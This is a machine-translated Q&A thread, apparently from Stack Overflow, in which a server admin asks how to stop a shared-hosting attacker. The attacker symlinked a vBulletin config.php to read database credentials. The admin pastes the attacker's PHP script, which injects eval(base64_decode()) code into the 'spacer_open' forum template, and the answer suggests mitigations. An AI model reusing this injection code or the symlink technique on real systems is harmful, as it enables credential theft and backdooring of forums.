0

PHPのセキュリティに問題があります。vBulletinフォーラム スクリプトconfig.phpを取得しようとしている人がいることがわかりました。たとえば、ユーザーmattに vBulletin スクリプトがインストールされています。

したがって、vbulletin フォーラムの仮想ホスト ディレクトリは次のようになります。

/home/matt/public_html/forum/includes/config.php

ここで、ハッカーは別のユーザーでログインしました。彼をjohnと呼びましょう。彼は、関数function_existbase64_decodeおよびに基づく PHP スクリプトをアップロードしましたfile_get_contents。これはコードの一部です。

完全なスクリプトは にありますhttp://www.textswell.com/read,4207852514827

シンボリックリンクを介してデータベース情報を取得できることがわかりました。

183697715 lrwxrwxrwx 1 john john 49 Oct  9 00:01 g.html -> /home/matt/public_html/forum/includes/config.php

ファイルをシンボリック リンクして、データベース情報を読み取るにはどうすればよいでしょうか。彼がしたのはそれだけではありません。彼はまた、すべてのテンプレート データベースに書き込むことができる SQL スクリプトを持っています。完全なコードは次のとおりです。

    <INPUT value=\"&#1593;&#1583;&#1604;\" name=\"send\" type=\"submit\">
    </FORM>";
}
else {
    $localhost = $_POST['localhost'];
    $database  = $_POST['database'];
    $username  = $_POST['username'];
    $password  = $_POST['password'];
    $index     = $_POST['index'];
    @mysql_connect($localhost,$username,$password) or die(mysql_error());
    @mysql_select_db($database) or die(mysql_error());

    $index=str_replace("\'","'",$index);

    $set_index  = "{\${eval(base64_decode(\'";

    $set_index .= base64_encode("echo \"$index\";");

    $set_index .= "\'))}}{\${exit()}}</textarea>";

    $ok=@mysql_query("UPDATE template SET template ='".$set_index."' WHERE title ='spacer_open'") or die(mysql_error());

    if($ok){
        echo "!! update finish !!<br><br>";
    }
}
# Footer
echo "<strong>SpeciaL GreeTz To :</strong> <u>Abu-NaiF</u>";
?>

それらの機能を無効にすることはできません。多くのスクリプトがそれに依存しており、スクリプトに記述されたMySQLクエリを停止するために mod セキュリティを介してルールを設定する方法もわかりません。

解決策はありますか?

4

1 に答える 1

1

あなたのサイトは侵害されています

この攻撃は、現在の WordPress 攻撃に似ています。通常、ハッカーは電話echo file_get_contents('/etc/passwd');をかけ、それらすべてのファイルをスキャンしてdatabase、 、localhostpasswordおよびその他の非常に機密性の高い単語を検索します。そして、configシンボリックにアクセスできるファイルを作成します。それから彼は破壊を行います。

そして、私の知る限り、彼はc99 script. 現在実行できる予防措置は次のとおりです。

  1. 他のユーザーのために削除execute permissionします。また、 PHP (および Perl) アクセスを他のユーザーに提供しないでください。
  2. キャッシュ ファイルを削除し、使用されていないワイヤリングされた名前ファイルを削除します。
  3. root 以外のユーザーがシンボリック リンクを作成しないようにする方法の手順をすべてお読みください。

幸いなことに、ハッカーがデータベースに損害を与えていないようです (よくわかりません)。

于 2012-10-12T22:59:57.040 に答える